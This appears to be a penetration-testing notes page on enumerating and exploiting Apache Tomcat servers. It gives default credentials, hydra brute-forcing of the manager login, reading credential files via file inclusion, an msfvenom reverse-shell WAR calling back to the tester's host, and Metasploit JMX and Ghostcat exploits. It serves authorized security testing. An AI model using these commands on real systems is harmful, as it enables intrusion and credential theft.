enumeration

1. Tomcat Version Detection

Methods:

HTTP Server Header:
```
curl -I http://target:port/ | grep -i "Server"
```
- Check if the "Server" header reveals the Tomcat version.
/docs Page:
```
curl -s http://target:port/docs/ | grep -i "Apache Tomcat"
```
- Default documentation page may disclose the version.
Error Pages:
```
curl -s http://target:port/nonexistentpage
```
- Sometimes, error pages leak version information.
Specific File Checks:
- If access is gained, check JAR files in /lib directory.
- Version-specific vulnerabilities may relate to these files.

2. Tomcat Directory Structure (Key Files)

/bin - Executable scripts.
/conf/tomcat-users.xml - Stores user credentials and roles.
/conf/web.xml - Defines web application routes and configurations.
/webapps/ - Web application deployment directory.

3. Manager Application Enumeration

Directory Brute-forcing:

Using Gobuster:

gobuster dir -u http://target:port/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Using Wfuzz:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://target:port/FUZZ

Look for /manager and /host-manager paths.

Authentication Checks:

Default Credentials:

tomcat:tomcat
admin:admin
tomcat:password
role1:role1
role:changeme

Brute-forcing Credentials:

hydra -l tomcat -P /usr/share/wordlists/rockyou.txt target http-get /manager/html

If access is gained, check for application deployment, undeployment, and management functionalities.

4. Tomcat Credential Enumeration

tomcat-users.xml Enumeration:

Local File Inclusion (LFI) to read credentials:
```
cat /conf/tomcat-users.xml
```
Check for plaintext usernames and passwords.

web.xml Enumeration:

Identify application endpoints:
```
cat /webapps/[app]/WEB-INF/web.xml
```
Useful for mapping application routes and identifying potential attack vectors.

5. WAR File Upload (Remote Code Execution)

After authentication to /manager:
- Upload a malicious WAR file containing a JSP web shell.

Create JSP reverse shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=yourIP LPORT=yourPort -f war > shell.war

Deploy via Manager interface and access via browser:
```
http://target:port/shell.jsp
```

6. JMX Enumeration & Exploitation

Using jmxterm:

java -jar jmxterm-1.0-alpha-4-uber.jar --url service:jmx:rmi:///jndi/rmi://target:port/jmxrmi

Explore MBeans and their attributes/operations.

Using Metasploit:

use exploit/multi/misc/java_jmx_server
set RHOST target
set RPORT 1099
run

JMX can expose sensitive information and allow for RCE.

7. Connector Enumeration

AJP Connector:

Check if AJP is enabled (Default: Port 8009):
```
nmap -p 8009 --script ajp-headers target
```
Exploit AJP using Ghostcat (CVE-2020-1938):
```
python3 ghostcat.py -u target:8009
```
AJP misconfigurations can lead to sensitive file disclosure or code execution.

8. Web Application Enumeration

Directory & File Enumeration:

Enumerate web applications in /webapps/ directory:

gobuster dir -u http://target:port/webapps/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Find JSP files and servlets:

wfuzz -c -z file,/usr/share/wordlists/extensions_common.txt --hc 404 http://target:port/FUZZ.jsp

Parameter Fuzzing:

Fuzz application parameters for vulnerabilities:

ffuf -u http://target:port/index.php?FUZZ=value -w /usr/share/wordlists/parameters.txt

9. Configuration File Enumeration

Identify sensitive configuration files:
- catalina.properties
- server.xml
- context.xml
Extract credentials, ports, and security settings.

10. CVE Enumeration & Exploitation

Identify version-specific vulnerabilities:
```
searchsploit tomcat [version]
```
Public exploits for Tomcat:
```
exploitdb -s tomcat
```

Important Considerations

Least Privilege: Use minimal required privileges during enumeration.
Target Scope: Stay within the defined scope of the penetration test.
Documentation: Record all findings and methodologies.
Client Communication: Keep the client informed of critical discoveries.
Clean Up: Remove temporary files and restore original configurations if testing in an authorized environment.

Summary of Key Findings

Server Header & Docs: Identify Tomcat version.
tomcat-users.xml: Extract credentials and roles.
web.xml: Map routes and servlets.
/manager & /host-manager: Manage applications.
WAR File Upload: Achieve RCE.
JMX Exposure: Possible RCE and data leaks.
AJP Connector: Check for misconfigurations.
Common CVEs: Search for known exploits.

Previouscgi-enum Nextfinding

Last updated 1 day ago

hashtag1. Tomcat Version Detection

hashtagMethods:

hashtag2. Tomcat Directory Structure (Key Files)

hashtag3. Manager Application Enumeration

hashtagDirectory Brute-forcing:

hashtagAuthentication Checks:

hashtag4. Tomcat Credential Enumeration

hashtagtomcat-users.xml Enumeration:

hashtagweb.xml Enumeration:

hashtag5. WAR File Upload (Remote Code Execution)

hashtag6. JMX Enumeration & Exploitation

hashtagUsing jmxterm:

hashtagUsing Metasploit:

hashtag7. Connector Enumeration

hashtagAJP Connector:

hashtag8. Web Application Enumeration

hashtagDirectory & File Enumeration:

hashtagParameter Fuzzing:

hashtag9. Configuration File Enumeration

hashtag10. CVE Enumeration & Exploitation

hashtagImportant Considerations

hashtagSummary of Key Findings